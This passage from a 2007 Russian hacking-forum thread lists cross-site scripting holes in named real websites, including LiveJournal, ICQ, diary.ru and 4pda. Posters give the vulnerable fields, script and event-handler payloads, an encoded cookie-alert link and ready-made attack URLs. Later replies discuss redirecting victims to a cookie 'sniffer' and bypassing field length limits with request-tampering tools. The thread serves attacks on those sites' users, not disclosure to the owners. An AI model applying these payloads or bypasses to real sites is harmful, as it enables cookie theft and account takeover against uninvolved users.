ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 03.09.2007, 15:15
Аватар для XenOtai
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436

Репутация: 68
Отправить сообщение для XenOtai с помощью ICQ
По умолчанию

Цитата:
http://diary.ru/options/diary/?mydiary
Уязвимо поле "Название дневника". Каждый, кто зайдёт на Ваш дневник, напорется на хсс.

Пример запроса в поле:

Цитата:
"><script>alert(document.cookie)</script>
 
Ответить с цитированием

  #82  
Старый 04.09.2007, 18:28
Аватар для l-l00K
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
Провел на форуме:
13395217

Репутация: 2097
По умолчанию

Код:
http://musicscope.ru/content/led-zeppelin-%D1%81%D0%BD%D0%BE%D0%B2%D0%B0-%D0%B2%D0%BC%D0%B5%D1%81%D1%82%D0%B5%3F
Оставляем комментарий такого вида:
Код:
"><script>alert('xss')</script>
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #83  
Старый 04.09.2007, 22:27
Аватар для XenOtai
XenOtai
Познающий
Регистрация: 30.12.2006
Сообщений: 32
Провел на форуме:
383436

Репутация: 68
Отправить сообщение для XenOtai с помощью ICQ
По умолчанию

Цитата:
livejournal.com
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.

Пример запроса:

Цитата:
<script>alert(document.cookie)</script>

Пример можно посмотреть здесь:

Цитата:
http://test-govno.livejournal.com/profile
PS. Не должны быть указаны страна и часовой пояс.

Последний раз редактировалось XenOtai; 04.09.2007 в 22:53..
 
Ответить с цитированием

  #84  
Старый 14.09.2007, 21:07
Аватар для AdReNa1!Ne
AdReNa1!Ne
Участник форума
Регистрация: 24.05.2007
Сообщений: 229
Провел на форуме:
2308963

Репутация: 309
Отправить сообщение для AdReNa1!Ne с помощью ICQ
По умолчанию

http://robotraff.com/userpanel/selltraff.php
Уязвимы все поля

Результат - http://robotraff.com/userpanel/stats.php?thread=136
 
Ответить с цитированием

  #85  
Старый 14.09.2007, 21:34
Аватар для lsass.exe
lsass.exe
Участник форума
Регистрация: 05.08.2007
Сообщений: 236
Провел на форуме:
4625160

Репутация: 457
По умолчанию

http://www.bolero.ru//index.php?level=5&stype=quick&topic=0&cur_topic=0& cur_fquery=%3Cscript%3Ealert%28%5C%27xss%5C%27%29% 3C%2Fscript%3E&sclass=all&cat=0&fquery=%22%3E%3Csc ript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&cat=0&x =0&y=0

http://4pda.ru/sr.php?query=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
 
Ответить с цитированием

  #86  
Старый 22.09.2007, 14:31
Аватар для +StArT+
+StArT+
Познающий
Регистрация: 10.02.2007
Сообщений: 38
Провел на форуме:
1223241

Репутация: 183
Отправить сообщение для +StArT+ с помощью ICQ
По умолчанию

Активная XSS на infostore.org
На момент описания уязвимости, на infostore Администрацией были приняты меры, и включена привязка к IP адресу.
.................................................. .......................
Уязвимость существует из-за недостаточной фильтрации входных данных в поле "текст:"
при добавлении новости пользователем, и в личных сообщениях.
В поле "текст:" пишем следующие:
Код:
<img src="a"onError=javascript:alert('XSS');>
Также, еще была найдена пассивная XSS
Код:
<a href="javascript:String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41,60,47,115,99,114,105,112,116,62)">XSS</a>
.................................................. .......................
______________________________________________
*****************************************
 
Ответить с цитированием

  #87  
Старый 25.09.2007, 13:37
Аватар для F1anKeR
F1anKeR
Новичок
Регистрация: 24.09.2007
Сообщений: 3
Провел на форуме:
13413

Репутация: 0
По умолчанию

Цитата:
Сообщение от XenOtai  
Активная хсс в поле "штат вне США (провинция, территория)". Каждый, кто зайдёт в Ваш профиль, напорется на хсс.
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
 
Ответить с цитированием

  #88  
Старый 25.09.2007, 13:47
Аватар для Scipio
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Цитата:
Сообщение от F1anKeR  
длина поля maxlength="50" , не хватает, чтобы нормальный редирект на сниффер поставить
Это не сложно обойти с помощью снифера и конструктора запросов, типа naviscope и inetcrack или Data tamper для FF или банального исправления формы у себя на винте
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

  #89  
Старый 26.09.2007, 12:40
Аватар для freddi
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно
 
Ответить с цитированием

  #90  
Старый 21.10.2007, 04:35
Аватар для SSSetuPPP
SSSetuPPP
Познающий
Регистрация: 22.01.2007
Сообщений: 32
Провел на форуме:
214445

Репутация: 0
Question

Цитата:
Сообщение от freddi  
icq.com

все прошлые прикрыли, но:
опять в блоге, и опять уязвимо поле "Image web address:"
"onmouseover="alert('xss')"
все символы не фильтруются и кол-во не ограниченно
Где находится это поле "Image web address:"?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ